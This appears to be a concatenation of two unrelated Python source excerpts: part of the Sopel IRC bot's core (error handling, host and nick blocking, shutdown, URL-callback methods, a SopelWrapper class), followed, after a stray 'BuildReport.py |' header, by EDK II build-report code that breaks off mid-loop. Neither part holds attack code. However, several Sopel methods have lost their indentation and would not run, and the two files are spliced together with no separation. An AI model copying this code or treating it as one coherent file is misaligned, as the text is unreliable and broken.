This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
# event handlers
def on_scheduler_error(self, scheduler, exc):
    """Called when the Job Scheduler fails.

    :param scheduler: the job scheduler that errored
    :type scheduler: :class:`sopel.plugins.jobs.Scheduler`
    :param Exception exc: the raised exception

    .. seealso::

        :meth:`Sopel.error`
    """
    # delegate straight to the bot's shared error handler
    self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
    """Called when a job from the Job Scheduler fails.

    :param scheduler: the job scheduler responsible for the errored ``job``
    :type scheduler: :class:`sopel.plugins.jobs.Scheduler`
    :param job: the Job that errored
    :type job: :class:`sopel.tools.jobs.Job`
    :param Exception exc: the raised exception

    .. seealso::

        :meth:`Sopel.error`
    """
    # delegate straight to the bot's shared error handler
    self.error(exception=exc)
def error(self, trigger=None, exception=None):
    """Called internally when a plugin causes an error.

    :param trigger: the ``Trigger``\\ing line (if available)
    :type trigger: :class:`sopel.trigger.Trigger`
    :param Exception exception: the exception raised by the error (if
                                available)
    """
    # build the most detailed message the available context allows
    message = 'Unexpected error'
    if exception:
        message = '{} ({})'.format(message, exception)
    if trigger:
        message = '{} from {} at {}. Message was: {}'.format(
            message, trigger.nick, str(datetime.utcnow()), trigger.group(0)
        )

    LOGGER.exception(message)

    # optionally echo the error back to where it came from
    can_reply = (
        trigger
        and self.settings.core.reply_errors
        and trigger.sender is not None
    )
    if can_reply:
        self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
    """Internal bot shutdown method.

    Stops the job scheduler (with a bounded join), then runs every
    registered plugin shutdown routine, logging — but not propagating —
    any error they raise.
    """
    LOGGER.info("Shutting down")

    # stop the Job Scheduler and wait for it, but never forever
    LOGGER.info("Stopping the Job Scheduler.")
    self._scheduler.stop()

    try:
        self._scheduler.join(timeout=15)
    except RuntimeError:
        LOGGER.exception("Unable to stop the Job Scheduler.")
    else:
        LOGGER.info("Job Scheduler stopped.")

    self._scheduler.clear_jobs()

    # run plugin shutdown routines; one failing must not stop the rest
    LOGGER.info(
        "Calling shutdown for %d plugins.", len(self.shutdown_methods))
    for shutdown_method in self.shutdown_methods:
        try:
            LOGGER.debug(
                "Calling %s.%s",
                shutdown_method.__module__,
                shutdown_method.__name__)
            shutdown_method(self)
        except Exception as e:
            LOGGER.exception("Error calling shutdown method: %s", e)

    # Avoid calling shutdown methods if we already have.
    self.shutdown_methods = []
# URL callbacks management
@deprecated(
    reason='Issues with @url decorator have been fixed. Simply use that.',
    version='7.1',
    warning_in='8.0',
    removed_in='9.0',
)
def register_url_callback(self, pattern, callback):
    """Register a ``callback`` for URLs matching the regex ``pattern``.

    :param pattern: compiled regex pattern to register (a plain string
                    is compiled for convenience)
    :type pattern: :ref:`re.Pattern <python:re-objects>`
    :param callback: callable object to handle matching URLs
    :type callback: :term:`function`

    .. versionadded:: 7.0

        This method replaces manual management of ``url_callbacks`` in
        Sopel's plugins; prefer it over touching ``bot.memory`` directly.
        Better still, avoid manual management of URL callbacks entirely
        through the use of :func:`sopel.plugin.url`.

    .. deprecated:: 7.1

        Made obsolete by fixes to the behavior of
        :func:`sopel.plugin.url`. Will be removed in Sopel 9.

    .. versionchanged:: 8.0

        Stores registered callbacks in an internal property instead of
        ``bot.memory['url_callbacks']``.
    """
    if isinstance(pattern, str):
        pattern = re.compile(pattern)

    self._url_callbacks[pattern] = callback
@deprecated(
    reason='Issues with @url decorator have been fixed. Simply use that.',
    version='7.1',
    warning_in='8.0',
    removed_in='9.0',
)
def unregister_url_callback(self, pattern, callback):
    """Unregister the callback for URLs matching the regex ``pattern``.

    :param pattern: compiled regex pattern to unregister callback
                    (a plain string is compiled for convenience)
    :type pattern: :ref:`re.Pattern <python:re-objects>`
    :param callback: callable object to remove
    :type callback: :term:`function`

    .. versionadded:: 7.0

        This method replaces manual management of ``url_callbacks`` in
        Sopel's plugins; prefer it over touching ``bot.memory`` directly.
        Better still, avoid manual management of URL callbacks entirely
        through the use of :func:`sopel.plugin.url`.

    .. deprecated:: 7.1

        Made obsolete by fixes to the behavior of
        :func:`sopel.plugin.url`. Will be removed in Sopel 9.

    .. versionchanged:: 8.0

        Deletes registered callbacks from an internal property instead
        of ``bot.memory['url_callbacks']``.
    """
    if isinstance(pattern, str):
        pattern = re.compile(pattern)

    # unknown patterns are silently ignored, as before
    self._url_callbacks.pop(pattern, None)
def search_url_callbacks(self, url):
    """Yield callbacks whose regex pattern matches the ``url``.

    :param str url: URL found in a trigger
    :return: yield 2-value tuples of ``(callback, match)``

    For each registered pattern whose ``search`` matches ``url``, this
    yields the callback registered with :meth:`register_url_callback`
    together with the resulting match object.

    .. versionadded:: 7.0

    .. versionchanged:: 8.0

        Searches for registered callbacks in an internal property
        instead of ``bot.memory['url_callbacks']``.

    .. deprecated:: 8.0

        Made obsolete by fixes to the behavior of
        :func:`sopel.plugin.url`. Will be removed in Sopel 9.
    """
    for pattern, handler in self._url_callbacks.items():
        found = pattern.search(url)
        if found:
            yield handler, found
def restart(self, message):
    """Disconnect from IRC and restart the bot.

    :param str message: QUIT message to send (e.g. "Be right back!")
    """
    # the restart flag is read after the connection closes
    self.wantsrestart = True
    self.quit(message)
class SopelWrapper:
    """Wrapper around a Sopel instance and a Trigger.

    :param sopel: Sopel instance
    :type sopel: :class:`~sopel.bot.Sopel`
    :param trigger: IRC Trigger line
    :type trigger: :class:`~sopel.trigger.Trigger`
    :param str output_prefix: prefix for messages sent through this wrapper
                              (e.g. plugin tag)

    Plugin callables receive an instance of this class as their ``bot``
    argument. It proxies attribute access to the wrapped Sopel instance
    while overriding the messaging methods so they target the trigger's
    origin (channel or private message) by default.
    """
    def __init__(self, sopel, trigger, output_prefix=''):
        # normalize falsy prefixes (None, False, ...) to ''
        prefix = output_prefix or ''
        # __setattr__ below forwards writes to the wrapped bot; bypass
        # it here so these stay on the wrapper itself
        object.__setattr__(self, '_bot', sopel)
        object.__setattr__(self, '_trigger', trigger)
        object.__setattr__(self, '_out_pfx', prefix)

    def __dir__(self):
        # advertise the wrapper's own API plus everything on the bot
        own = [
            attr for attr in self.__class__.__dict__
            if not attr.startswith('__')
        ]
        return list(self.__dict__) + own + dir(self._bot)

    def __getattr__(self, attr):
        # anything not found on the wrapper comes from the wrapped bot
        return getattr(self._bot, attr)

    def __setattr__(self, attr, value):
        # attribute writes land on the wrapped bot, not the wrapper
        return setattr(self._bot, attr, value)

    def say(self, message, destination=None, max_messages=1, truncation='', trailing=''):
        """Override ``Sopel.say`` to use trigger source by default.

        :param str message: message to say
        :param str destination: channel or nickname; defaults to
            :attr:`trigger.sender <sopel.trigger.Trigger.sender>`
        :param int max_messages: split ``message`` into at most this many
                                 messages if it is too long to fit into
                                 one line (optional)
        :param str truncation: string to indicate that the ``message``
                               was truncated (optional)
        :param str trailing: string that should always appear at the end
                             of ``message`` (optional)

        .. seealso::

            :meth:`sopel.bot.Sopel.say`
        """
        target = self._trigger.sender if destination is None else destination
        self._bot.say(
            self._out_pfx + message, target,
            max_messages, truncation, trailing)

    def action(self, message, destination=None):
        """Override ``Sopel.action`` to use trigger source by default.

        :param str message: action message
        :param str destination: channel or nickname; defaults to
            :attr:`trigger.sender <sopel.trigger.Trigger.sender>`

        .. seealso::

            :meth:`sopel.bot.Sopel.action`
        """
        target = self._trigger.sender if destination is None else destination
        self._bot.action(message, target)

    def notice(self, message, destination=None):
        """Override ``Sopel.notice`` to use trigger source by default.

        :param str message: notice message
        :param str destination: channel or nickname; defaults to
            :attr:`trigger.sender <sopel.trigger.Trigger.sender>`

        .. seealso::

            :meth:`sopel.bot.Sopel.notice`
        """
        target = self._trigger.sender if destination is None else destination
        self._bot.notice(self._out_pfx + message, target)

    def reply(self, message, destination=None, reply_to=None, notice=False):
        """Override ``Sopel.reply`` to ``reply_to`` sender by default.

        :param str message: reply message
        :param str destination: channel or nickname; defaults to
            :attr:`trigger.sender <sopel.trigger.Trigger.sender>`
        :param str reply_to: person to reply to; defaults to
            :attr:`trigger.nick <sopel.trigger.Trigger.nick>`
        :param bool notice: reply as an IRC notice or with a simple message

        .. seealso::

            :meth:`sopel.bot.Sopel.reply`
        """
        target = self._trigger.sender if destination is None else destination
        if reply_to is None:
            reply_to = self._trigger.nick
        self._bot.reply(message, target, reply_to, notice)

    def kick(self, nick, channel=None, message=None):
        """Override ``Sopel.kick`` to kick in a channel

        :param str nick: nick to kick out of the ``channel``
        :param str channel: optional channel to kick ``nick`` from;
            defaults to the channel the call was triggered in, and is
            required when triggered from a private message
        :param str message: optional message for the kick

        .. seealso::

            :meth:`sopel.bot.Sopel.kick`
        """
        if channel is None:
            if self._trigger.is_privmsg:
                raise RuntimeError('Error: KICK requires a channel.')
            channel = self._trigger.sender
        if nick is None:
            raise RuntimeError('Error: KICK requires a nick.')
        self._bot.kick(nick, channel, message)
|
BuildReport.py | ## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
# The %(Address)s placeholders are filled in by the %-substitution below
# before the pattern is compiled.
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
# Matches both #include "X.h" and #include <X.h> forms.
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
# Matches the EDK macro include form: #include EFI_XXX_YYY (Name)
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
  TAB_PCDS_FIXED_AT_BUILD     : ('FIXED',  TAB_PCDS_FIXED_AT_BUILD),
  TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH',  TAB_PCDS_PATCHABLE_IN_MODULE),
  TAB_PCDS_FEATURE_FLAG       : ('FLAG',   TAB_PCDS_FEATURE_FLAG),
  TAB_PCDS_DYNAMIC            : ('DYN',    TAB_PCDS_DYNAMIC),
  TAB_PCDS_DYNAMIC_HII        : ('DYNHII', TAB_PCDS_DYNAMIC),
  TAB_PCDS_DYNAMIC_VPD        : ('DYNVPD', TAB_PCDS_DYNAMIC),
  TAB_PCDS_DYNAMIC_EX         : ('DEX',    TAB_PCDS_DYNAMIC_EX),
  TAB_PCDS_DYNAMIC_EX_HII     : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
  TAB_PCDS_DYNAMIC_EX_VPD     : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
  }
## The look up table to map module type to driver type
gDriverTypeMap = {
  SUP_MODULE_SEC               : '0x3 (SECURITY_CORE)',
  SUP_MODULE_PEI_CORE          : '0x4 (PEI_CORE)',
  SUP_MODULE_PEIM              : '0x6 (PEIM)',
  SUP_MODULE_DXE_CORE          : '0x5 (DXE_CORE)',
  SUP_MODULE_DXE_DRIVER        : '0x7 (DRIVER)',
  SUP_MODULE_DXE_SAL_DRIVER    : '0x7 (DRIVER)',
  SUP_MODULE_DXE_SMM_DRIVER    : '0x7 (DRIVER)',
  SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
  SUP_MODULE_UEFI_DRIVER       : '0x7 (DRIVER)',
  SUP_MODULE_UEFI_APPLICATION  : '0x9 (APPLICATION)',
  SUP_MODULE_SMM_CORE          : '0xD (SMM_CORE)',
  'SMM_DRIVER'                 : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
  SUP_MODULE_MM_STANDALONE     : '0xE (MM_STANDALONE)',
  SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
  }
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
    """Write a string to the report file object followed by the report EOL.

    @param File     The file object to write to
    @param String   The string to be written
    @param Wrapper  When True, wrap the string for better readability
    """
    if Wrapper:
        # Wrap at the report-wide maximum line length instead of repeating
        # the magic number 120 (gLineMaxLength is 120).
        String = textwrap.fill(String, gLineMaxLength)
    File.write(String + gEndOfLine)
def ByteArrayForamt(Value):
    """Split a byte-array PCD value string into printable rows.

    A value of the form "{0x01,0x02,...}" with at least 16 elements is
    treated as a byte array: every element is normalized to "0xNN" and the
    list is split into rows of 16 values for the report; each row but the
    last keeps a trailing comma, the last row is closed with '}'.

    @param Value        The PCD value string to format
    @retval IsByteArray True when Value was recognized as a byte array
    @retval ArrayList   The list of formatted row strings (only meaningful
                        to callers when IsByteArray is True)
    """
    SplitNum = 16
    IsByteArray = False
    if Value.startswith('{') and Value.endswith('}'):
        Value = Value[1:-1]
        ValueList = Value.split(',')
        IsByteArray = len(ValueList) >= SplitNum
    if not IsByteArray:
        # Preserve the original fallback shape: ArrayList is ignored by
        # callers when IsByteArray is False.
        return False, [Value + '}']
    # Normalize every element to the canonical two-digit 0xNN form.
    ValueList = ['0x%02X' % int(Item.strip(), 16) for Item in ValueList]
    ArrayList = []
    # NOTE: the previous implementation computed len(ValueList)/SplitNum,
    # which is float division under Python 3 and only terminated correctly
    # thanks to an inner break; explicit integer chunking avoids that.
    for Start in range(0, len(ValueList), SplitNum):
        End = min(Start + SplitNum, len(ValueList))
        Row = ','.join(ValueList[Start:End])
        Row += '}' if End == len(ValueList) else ','
        ArrayList.append(Row)
    return True, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
    ## Scan one source file for #include directives and record every header found.
    #
    # Handles both the plain #include "X.h" / <X.h> form and the EDK style
    # #include EFI_XXX_YYY(Name) macro form, resolving each candidate
    # against the include path list and storing hits into IncludeFiles.
    #
    # @param Source            The source file name
    # @param IncludePathList   The list of include paths to search
    # @param IncludeFiles      The dictionary of include files found so far
    #
    FileContents = open(Source).read()
    #
    # Plain directives: #include "XXX.h" or #include <XXX.h>
    #
    for Match in gIncludePattern.finditer(FileContents):
        HeaderName = Match.group(1).strip()
        # The source file's own directory is searched first.
        for SearchDir in [os.path.dirname(Source)] + IncludePathList:
            Candidate = os.path.normpath(os.path.join(SearchDir, HeaderName))
            if os.path.exists(Candidate):
                IncludeFiles[Candidate.lower().replace("\\", "/")] = Candidate
                break
    #
    # EDK macro directives: #include EFI_PPI_CONSUMER(XXX) and friends
    #
    for Match in gIncludePattern2.finditer(FileContents):
        MacroType = Match.group(1)
        BaseName = Match.group(2)
        # ARCH_PROTOCOL must be tested before the plain PROTOCOL substring.
        if "ARCH_PROTOCOL" in MacroType:
            SubDir = "ArchProtocol"
        elif "PROTOCOL" in MacroType:
            SubDir = "Protocol"
        elif "PPI" in MacroType:
            SubDir = "Ppi"
        elif TAB_GUID in MacroType:
            SubDir = "Guid"
        else:
            continue
        HeaderName = "%s/%s/%s.h" % (SubDir, BaseName, BaseName)
        for SearchDir in IncludePathList:
            Candidate = os.path.normpath(os.path.join(SearchDir, HeaderName))
            if os.path.exists(Candidate):
                IncludeFiles[Candidate.lower().replace("\\", "/")] = Candidate
                break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
    ## Re-flow file content so no line exceeds MaxLength characters.
    #
    # Long lines are broken at the right-most space, slash or backslash
    # before the limit when one exists past column 0, otherwise hard-cut
    # at MaxLength.  The result is joined with the report end-of-line.
    #
    # @param Content     The content of the file
    # @param MaxLength   The maximum length allowed per line
    #
    Segments = []
    for Line in Content.split(TAB_LINE_BREAK):
        while len(Line.rstrip()) > MaxLength:
            BreakAt = max(
                Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength),
                Line.rfind(TAB_SLASH, 0, MaxLength),
                Line.rfind(TAB_BACK_SLASH, 0, MaxLength),
            )
            if BreakAt <= 0:
                BreakAt = MaxLength
            Segments.append(Line[:BreakAt])
            Line = Line[BreakAt:]
        if Line:
            Segments.append(Line)
    Joined = ''.join(Segment + TAB_LINE_BREAK for Segment in Segments)
    # Normalize to the report EOL; the second replace collapses the
    # '\r\r\n' sequences produced when Content already contained '\r\n'.
    return Joined.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
    ##
    # Constructor function for class DepexParser
    #
    # This constructor function collect GUID values so that the readable
    # GUID name can be translated.
    #
    # @param self            The object pointer
    # @param Wa              Workspace context information
    #
    def __init__(self, Wa):
        # Map of upper-case registry-format GUID string -> readable C name,
        # built from every package's Protocols, Ppis and Guids declarations.
        self._GuidDb = {}
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                for Protocol in Package.Protocols:
                    GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
                    self._GuidDb[GuidValue.upper()] = Protocol
                for Ppi in Package.Ppis:
                    GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
                    self._GuidDb[GuidValue.upper()] = Ppi
                for Guid in Package.Guids:
                    GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
                    self._GuidDb[GuidValue.upper()] = Guid
            for Ma in Pa.ModuleAutoGenList:
                for Pcd in Ma.FixedVoidTypePcds:
                    PcdValue = Ma.FixedVoidTypePcds[Pcd]
                    # A fixed VOID* PCD whose value is exactly 16 bytes is
                    # treated as a GUID so its name can be shown as well.
                    if len(PcdValue.split(',')) == 16:
                        GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
                        self._GuidDb[GuidValue.upper()] = Pcd
    ##
    # Parse the binary dependency expression files.
    #
    # This function parses the binary dependency expression file and translate it
    # to the instruction list.
    #
    # @param self            The object pointer
    # @param DepexFileName   The file name of binary dependency expression file.
    #
    def ParseDepexFile(self, DepexFileName):
        # NOTE(review): the file handle is never closed explicitly; it is
        # only released when the object is garbage collected — confirm this
        # is acceptable for the build environment.
        DepexFile = open(DepexFileName, "rb")
        DepexStatement = []
        # Each statement starts with a one-byte opcode indexing gOpCodeList.
        OpCode = DepexFile.read(1)
        while OpCode:
            Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
            # BEFORE/AFTER/PUSH opcodes are followed by a 16-byte GUID
            # operand, rendered in registry format and translated to a
            # readable name when known.
            if Statement in ["BEFORE", "AFTER", "PUSH"]:
                GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
                            struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
                GuidString = self._GuidDb.get(GuidValue, GuidValue)
                Statement = "%s %s" % (Statement, GuidString)
            DepexStatement.append(Statement)
            OpCode = DepexFile.read(1)
        return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
    ##
    # Constructor function for class LibraryReport
    #
    # This constructor function generates LibraryReport object for
    # a module.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        self.LibraryList = []
        # AutoGen version >= 0x00010005 marks an EDKII style module.
        if int(str(M.AutoGenVersion), 0) >= 0x00010005:
            self._EdkIIModule = True
        else:
            self._EdkIIModule = False
        for Lib in M.DependentLibraryList:
            LibInfPath = str(Lib)
            LibClassList = Lib.LibraryClass[0].LibraryClass
            LibConstructorList = Lib.ConstructorList
            LibDesstructorList = Lib.DestructorList
            LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
            # Reset per library: previously LibTime was left unbound (first
            # iteration) or stale from the previous iteration when no
            # matching AutoGen object was found for this INF path.
            LibTime = ''
            for LibAutoGen in M.LibraryAutoGenList:
                if LibInfPath == LibAutoGen.MetaFile.Path:
                    LibTime = LibAutoGen.BuildTime
                    break
            self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
    ##
    # Generate report for module library information
    #
    # This function generates report for the module library.
    # If the module is EDKII style one, the additional library class, library
    # constructor/destructor and dependency expression may also be reported.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def GenerateReport(self, File):
        if len(self.LibraryList) > 0:
            FileWrite(File, gSubSectionStart)
            FileWrite(File, TAB_BRG_LIBRARY)
            FileWrite(File, gSubSectionSep)
            for LibraryItem in self.LibraryList:
                LibInfPath = LibraryItem[0]
                FileWrite(File, LibInfPath)
                #
                # Report library class, library constructor and destructor for
                # EDKII style module.
                #
                if self._EdkIIModule:
                    LibClass = LibraryItem[1]
                    EdkIILibInfo = ""
                    LibConstructor = " ".join(LibraryItem[2])
                    if LibConstructor:
                        EdkIILibInfo += " C = " + LibConstructor
                    LibDestructor = " ".join(LibraryItem[3])
                    if LibDestructor:
                        EdkIILibInfo += " D = " + LibDestructor
                    LibDepex = " ".join(LibraryItem[4])
                    if LibDepex:
                        EdkIILibInfo += " Depex = " + LibDepex
                    # Empty LibTime (no matching AutoGen object) is simply
                    # omitted from the report.
                    if LibraryItem[5]:
                        EdkIILibInfo += " Time = " + LibraryItem[5]
                    if EdkIILibInfo:
                        FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
                    else:
                        FileWrite(File, "{%s}" % LibClass)
            FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
    ##
    # Constructor function for class DepexReport
    #
    # This constructor function generates DepexReport object for
    # a module. If the module source contains the DXS file (usually EDK
    # style module), it uses the dependency in DXS file; otherwise,
    # it uses the dependency expression from its own INF [Depex] section
    # and then merges with the ones from its dependent library INF.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        self.Depex = ""
        self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
        ModuleType = M.ModuleType
        if not ModuleType:
            ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
        # Core and application module types carry no dependency expression,
        # so the report is left empty for them.
        if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
            return
        for Source in M.SourceFileList:
            if os.path.splitext(Source.Path)[1].lower() == ".dxs":
                Match = gDxsDependencyPattern.search(open(Source.Path).read())
                if Match:
                    self.Depex = Match.group(1).strip()
                    self.Source = "DXS"
                    break
        else:
            # for/else: runs only when no DXS dependency was found above
            # (no break taken); fall back to the [Depex] sections of the
            # module INF and its dependent library INFs.
            self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
            self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
            if not self.ModuleDepex:
                self.ModuleDepex = "(None)"
            LibDepexList = []
            for Lib in M.DependentLibraryList:
                LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
                if LibDepex != "":
                    LibDepexList.append("(" + LibDepex + ")")
            self.LibraryDepex = " AND ".join(LibDepexList)
            if not self.LibraryDepex:
                self.LibraryDepex = "(None)"
            self.Source = "INF"
    ##
    # Generate report for module dependency expression information
    #
    # This function generates report for the module dependency expression.
    #
    # @param self              The object pointer
    # @param File              The file object for report
    # @param GlobalDepexParser The platform global Dependency expression parser object
    #
    def GenerateReport(self, File, GlobalDepexParser):
        if not self.Depex:
            return
        FileWrite(File, gSubSectionStart)
        # When the final .depex binary exists, decode and list its
        # instructions first.
        if os.path.isfile(self._DepexFileName):
            try:
                DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
                FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
                for DepexStatement in DepexStatements:
                    FileWrite(File, "  %s" % DepexStatement)
                FileWrite(File, gSubSectionSep)
            except:
                EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
        FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
        # INF-sourced depex additionally reports the module and library
        # contributions separately.
        if self.Source == "INF":
            FileWrite(File, self.Depex, True)
            FileWrite(File, gSubSectionSep)
            FileWrite(File, "From Module INF:  %s" % self.ModuleDepex, True)
            FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
        else:
            FileWrite(File, self.Depex)
        FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
    ##
    # Constructor function for class BuildFlagsReport
    #
    # Collects, for a module, the build tool chain tag and the flags of
    # every tool that is actually relevant to the module's source files.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        #
        # Map each source extension to the tools whose flags matter for it,
        # so irrelevant tools are filtered out of the report.  Tool order
        # per extension determines the order flags appear in the report.
        #
        ToolsByExt = {
            ".c"     : ("CC",),
            ".cc"    : ("CC",),
            ".cpp"   : ("CC",),
            ".s"     : ("PP", "ASM"),
            ".asm"   : ("PP", "ASM"),
            ".vfr"   : ("VFRPP", "VFR"),
            ".dxs"   : ("APP", "CC"),
            ".asl"   : ("ASLPP", "ASL"),
            ".aslc"  : ("ASLCC", "ASLDLINK", "CC"),
            ".asm16" : ("ASMLINK", "SLINK", "DLINK"),
        }
        BuildOptions = {}
        for Source in M.SourceFileList:
            Ext = os.path.splitext(Source.File)[1].lower()
            for Tool in ToolsByExt.get(Ext, ()):
                BuildOptions[Tool] = 1
        #
        # Save module build flags.
        #
        self.ToolChainTag = M.ToolChain
        self.BuildFlags = {}
        for Tool in BuildOptions:
